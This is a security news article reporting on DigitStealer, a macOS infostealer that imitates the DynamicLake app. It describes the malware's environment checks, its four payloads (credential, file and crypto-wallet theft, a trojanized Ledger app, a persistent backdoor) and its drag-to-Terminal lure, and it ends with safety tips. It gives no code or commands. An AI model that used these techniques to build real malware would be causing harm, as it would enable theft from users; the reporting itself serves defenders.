A new infostealer is targeting macOS users by masquerading as the legitimate DynamicLake UI enhancement and productivity utility and possibly Google’s Drive for desktop app.
Multi-stage delivery
Dubbed DigitStealer by Jamf researchers, this threat is unusually sophisticated.
Before it’s run, a bash script – also executed entirely in-memory – checks the system’s country setting and terminates if it indicates that the machine is located in specific regions.
It also checks whether the machine is virtual and whether it’s running on an Apple Silicon M2 chip or newer (by checking for specific hardware features).
“The malware avoids running on virtual machines, Intel-based Macs, and whether by design or mistake, systems using the M1 chip, even though it is also part of the Apple Silicon family. Instead, it targets devices with newer ARM features introduced with M2 or later,” the researchers found.
If it “decides” the conditions are favorable, the scripts retrieves four separate payloads and starts dropping and running them.
The first payload is a simple AppleScript infostealer that asks users to enter their passwords and if they do, it starts exfiltrating credentials, small user files (documents, notes, etc.), and resets the macOS TCC database (where macOS records which apps are allowed to access sensitive data or system features).
The second payload zips and exfiltrates data from various popular browsers, the Keychain database, VPN configurations, Telegram’s tdata folder (which can be used to hijack Telegram accounts), and cryptocurrency wallet files from Ledger, Electrum, Exodus, Coinomi, etc.
The third payload replaces the app.asar file for the Ledger Wallet/Ledger Live crypto application with a trojanized version, thus making it connect to an attacker-operated server and essentially hijacking it, allowing the attacker to intercept or manipulate the victim’s crypto wallet data.
The fourth payload drops and loads a Launch Agent on the target system for persistence, and it dynamically retrieves payloads from the attacker’s server each time it runs. Initially, that final payload is a backdoor – a JavaScript for Automation (JXA) with full AppleScript powers – but the attacker can change the payloads at will.
Tricking users into running the “app”
“The sample that was discovered comes in the form of an unsigned disk image titled DynamicLake.dmg,” the researchers shared. “After digging further, we identified a few additional disk images tied to this campaign.”
The DynamicLake.dmg has been distributed via the https[:]//dynamiclake[.]org, a domain and site imitating that of the legitimate macOS utility of the same name.
Users who have been tricked into visiting this spoofed site are instructed to drag the file (actually the initial script) into the Mac’s Terminal, thus bypassing Gatekeeper.
The served malware installer (Source: Jamf)
Be careful when downloading Mac apps
“Attribution for this specific variant remains unclear currently. However, the techniques used suggest a deeper understanding of the macOS operating system and a continued focus on evading detection,” the researchers noted.
Malware authors continue abusing legitimate services and distribution methods to bypass macOS security controls and improve their chances of success, they added.
In the last few months, attackers have been creating convincing replicas of GitHub repos for popular Mac apps and using the “drag-to-Terminal” trick to get unsuspecting users into running malicious scirpts. (The usual process to install an app is to drag it to the Application folder.)
More recently, a Reddit user reported seeing this fake DynamicLake app as well as a fake version of AirPosture, which may or may not lead to a DigitStealer infection.
Users should be careful when searching for and installing new apps:
- Double-check you are on the right site / Github repo
- Use VirusTotal to scan the downloaded installer before running it
- Never drag an app to the Terminal
- You can use specialized apps to verify the app’s/installer’s signature
Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!